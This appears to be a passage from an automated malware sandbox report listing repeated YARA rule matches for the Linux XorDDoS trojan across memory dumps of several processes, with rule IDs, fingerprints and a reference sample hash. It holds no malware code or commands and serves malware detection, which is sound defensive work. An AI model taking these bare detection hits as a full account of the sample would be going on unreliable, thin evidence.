        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6231.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
